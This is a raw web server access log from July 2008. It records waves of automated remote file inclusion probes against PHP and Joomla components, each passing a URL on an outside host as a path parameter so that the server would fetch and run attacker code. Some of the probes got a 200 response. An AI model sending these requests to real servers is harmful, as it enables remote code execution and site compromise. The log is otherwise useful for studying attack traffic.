64.22.89.194 - - [24/Jul/2008:06:03:30 -0700] "GET /logs/access_080218.log//errors.php?error=http://futureikon.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.143.162 - - [24/Jul/2008:06:03:31 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:03:33 -0700] "GET /logs/access.log//errors.php?error=http://futureikon.com/cache/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:03:33 -0700] "GET //errors.php?error=http://futureikon.com/cache/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:03:33 -0700] "GET /logs//errors.php?error=http://futureikon.com/cache/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.143.162 - - [24/Jul/2008:06:03:34 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 200 18507 "-" "libwww-perl/5.810" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:03:53 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:03:54 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:03:55 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:04:00 -0700] "GET /logs/access_080218.log//errors.php?error=http://bchorseclassifieds.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:04:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 200 18513 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:06:04:08 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:06:04:08 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:04:10 -0700] "GET /logs/access_080218.log//errors.php?error=http://futureikon.com/cache/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.119.244.16 - - [24/Jul/2008:06:04:14 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:04:15 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:04:15 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.119.244.16 - - [24/Jul/2008:06:04:17 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 200 18507 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:06:04:37 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 200 18513 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.134.11 - - [24/Jul/2008:06:04:56 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.134.11 - - [24/Jul/2008:06:04:57 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:05:04 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:05:05 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:06:05:20 -0700] "GET /logs/access.log/errors.php?error=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:06:05:20 -0700] "GET /errors.php?error=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:06:05:21 -0700] "GET /logs/errors.php?error=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.126.108.198 - - [24/Jul/2008:06:05:41 -0700] "GET /logs/access_080329.log/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:05:42 -0700] "GET /logs/access_080313.log//claroline/exercice/testheaderpage.php?rootSys=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.126.108.198 - - [24/Jul/2008:06:05:42 -0700] "GET /logs/access_080329.log/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:05:42 -0700] "GET //claroline/exercice/testheaderpage.php?rootSys=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.126.108.198 - - [24/Jul/2008:06:05:42 -0700] "GET /errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.126.108.198 - - [24/Jul/2008:06:05:42 -0700] "GET /errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:05:42 -0700] "GET /logs//claroline/exercice/testheaderpage.php?rootSys=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.126.108.198 - - [24/Jul/2008:06:05:42 -0700] "GET /logs/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.126.108.198 - - [24/Jul/2008:06:05:42 -0700] "GET /logs/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:05:57 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:05:57 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:05:58 -0700] "GET /logs/access_080313.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:05:58 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:05:59 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.120.73 - - [24/Jul/2008:06:06:06 -0700] "GET //include/admin.lib.inc.php?site_path=http://bolikowski.com/images/tanii?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:06:48 -0700] "GET /logs/access_080313.log//claroline/tracking/userLog.php?rootSys=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:06:49 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:06:49 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:06:54 -0700] "GET /logs/access_080207.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.110.34 - - [24/Jul/2008:06:06:54 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.110.34 - - [24/Jul/2008:06:06:55 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.110.34 - - [24/Jul/2008:06:06:55 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.0.7.180 - - [24/Jul/2008:06:07:22 -0700] "GET /logs/access_080329.log/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.0.7.180 - - [24/Jul/2008:06:07:22 -0700] "GET /errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.0.7.180 - - [24/Jul/2008:06:07:23 -0700] "GET /logs/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.0.7.180 - - [24/Jul/2008:06:07:23 -0700] "GET /logs/access_080329.log/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.0.7.180 - - [24/Jul/2008:06:07:24 -0700] "GET /errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.0.7.180 - - [24/Jul/2008:06:07:24 -0700] "GET /logs/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.14.46.18 - - [24/Jul/2008:06:07:25 -0700] "GET /logs/access_080329.log/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [24/Jul/2008:06:07:25 -0700] "GET /errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [24/Jul/2008:06:07:25 -0700] "GET /logs/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:07:28 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:07:29 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:07:29 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [24/Jul/2008:06:07:31 -0700] "GET /logs/access_080329.log/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [24/Jul/2008:06:07:31 -0700] "GET /errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:07:31 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:07:31 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
200.14.46.18 - - [24/Jul/2008:06:07:32 -0700] "GET /logs/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:07:32 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:07:44 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:07:46 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:07:46 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:07:47 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 200 18459 "-" "libwww-perl/5.811" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:08:03 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:08:03 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:08:04 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:06:08:23 -0700] "GET /logs/access_071208.log HTTP/1.1" 200 94709 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
82.107.144.250 - - [24/Jul/2008:06:08:57 -0700] "GET //codebb/lang_select?phpbb_root_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.144.250 - - [24/Jul/2008:06:08:57 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.144.250 - - [24/Jul/2008:06:08:57 -0700] "GET /logs/access.log//codebb/lang_select?phpbb_root_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.144.250 - - [24/Jul/2008:06:08:59 -0700] "GET /logs/access_080218.log//codebb/lang_select?phpbb_root_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:09:06 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:09:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:09:07 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 200 18459 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.110.34 - - [24/Jul/2008:06:09:08 -0700] "GET /logs/access_080123.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:06:09:25 -0700] "GET /logs/access.log/errors.php?error=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:06:09:25 -0700] "GET /errors.php?error=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:06:09:26 -0700] "GET /logs/errors.php?error=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.206.90 - - [24/Jul/2008:06:09:46 -0700] "GET //codebb/lang_select?phpbb_root_path=http://tartufellinolol.altervista.org/piccino/id2.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.160.206.90 - - [24/Jul/2008:06:09:46 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://tartufellinolol.altervista.org/piccino/id2.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:09:49 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:09:49 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
81.25.54.205 - - [24/Jul/2008:06:10:26 -0700] "GET /logs/components/com_remository/com_remository_constants.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.25.54.205 - - [24/Jul/2008:06:10:27 -0700] "GET /components/com_remository/com_remository_constants.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:11:20 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:11:20 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:12:47 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:12:47 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:13:50 -0700] "GET /logs/access_080315.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.234.251.211 - - [24/Jul/2008:06:14:01 -0700] "GET /logs/access_080207.log/?path%5Bdocroot%5D=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:14:15 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:14:15 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:06:14:59 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:06:14:59 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:06:15:13 -0700] "GET /errors.php?error=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:06:15:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:06:15:25 -0700] "GET /phphtml.php?htmlclass_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:15:58 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:15:58 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:16:25 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:16:31 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=ftp://212.11.127.86/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:16:31 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=ftp://212.11.127.86/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:16:32 -0700] "GET //myspeach/jscript.php?my_ms[root]=ftp://212.11.127.86/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:16:32 -0700] "GET //myspeach/jscript.php?my_ms[root]=ftp://212.11.127.86/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:06:16:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/?D=D HTTP/1.0" 200 4809 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:17:29 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:17:29 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.111.173.117 - - [24/Jul/2008:06:17:29 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [24/Jul/2008:06:17:33 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 200 18505 "-" "libwww-perl/5.805" "www.dmulk.com"
